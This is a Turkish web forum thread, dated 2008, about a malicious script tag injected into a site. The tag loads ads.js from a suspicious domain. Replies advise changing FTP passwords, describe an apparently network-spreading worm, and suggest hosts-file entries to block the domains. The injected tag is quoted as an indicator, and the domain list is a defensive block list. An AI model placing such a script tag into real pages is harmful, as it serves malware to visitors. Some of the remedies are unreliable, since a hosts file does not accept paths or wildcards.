![]() |
|
|||||||
| Virus Spyware Spam Virus spyware spam phishing |
![]() |
|
|
LinkBack | Seçenekler | Stil |
|
|||
|
Arkadaşlar Arada sirada Admincp ve Konu içlerine giremiyordum
2-3 defa format attım gene aynı olduğunu farkettım Sonra admincp ye gırınce Authorization Required diyordu Kaynak kodlarına baktım Kod:
<SCRIPT LANGUAGE="javascript1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT> ![]() bazen giriyor bazen bu çıkıyor .. Google de araştırayım dedim 3-4 RUS forumunda yeni açılmış konusu bilgisi olan veya böle bi virüs yiyen ? Konu C0$kuN tarafından (2008-01-11 Saat 16:01 ) değiştirilmiştir.. |
|
||||
|
kodları siteden temizledikten sonra, ftp şifresini değiştirin.
emin olmak için ertesi gün aynı şifreyi tekrar değiştirin. buna rağmen kodlar tekrardan ekleniyorsa, serverı ele geçirmişler demektir, malware diye forumda aratırsanız bir yazı yazmıştım nasıl önlem alınacağı ile ilgili.
|
Arkadaşlar FTP ve SİTE ile alakası yok
Konunun Ciddi oluşu için Kaspersky forumunda açtıgım ve Resimlerle uğraştiğımız konuya bi göz atın http://forum.kaspersky.com/index.php...=0#entry523347 Bu kod sisteme entegre ediliyor daha sonra aynı Modem ile Aynı Ağda bulunan Bütün PC lere yansıyor. Girdiğiniz bütün sitelerin başına yerleşiyor. Malware .js ve .c dilinde yazılmış Yeni Worm lar Bu sene İnternetın belası olcak gibi. Kaspersky yetkilileri ile olayı zor cözdük Ağdaki diger bir PC ye bulaşmiş ve Tüm ağa yayılmış Bu Worm'un size gelmesini istemiyorsanız şimdiden önleminizi alın Çünkü yeni çıkan birşey ve AĞ dan yayılıyor. C:\WINDOWS\system32\drivers\etc\ içinde hosts 'u Notpad ile açıp Kod:
127.0.0.1 localhost Kod:
127.0.0.1 g.asdafdgfgf.com/ads.js 127.0.0.1 www.g.asdafdgfgf.com/ads.js 127.0.0.1 g.asdafdgfgf.com 127.0.0.1 www.g.asdafdgfgf.com 127.0.0.1 x.222360.com/ads.js 127.0.0.1 union.222360.com 127.0.0.1 www.222360.com 127.0.0.1 *.222360.com |
|
|||
|
Alıntı:
kendini kısa sürede heryere kopyalıyor o yüzden dikkatli olun arkadaşlar. |
|
|||
|
Yeni malware trojan, solucan vb. virüsleri hiçbir anti yakalamaz cünkü yeni kodlandığından dolayı Update leri yoktur.
Yapabilecegimiz tek şey birbirimize haber verip antivirüslerden önce önlem almamızı sağlamamız. |
![]() |
| Seçenekler | |
| Stil | |
|
|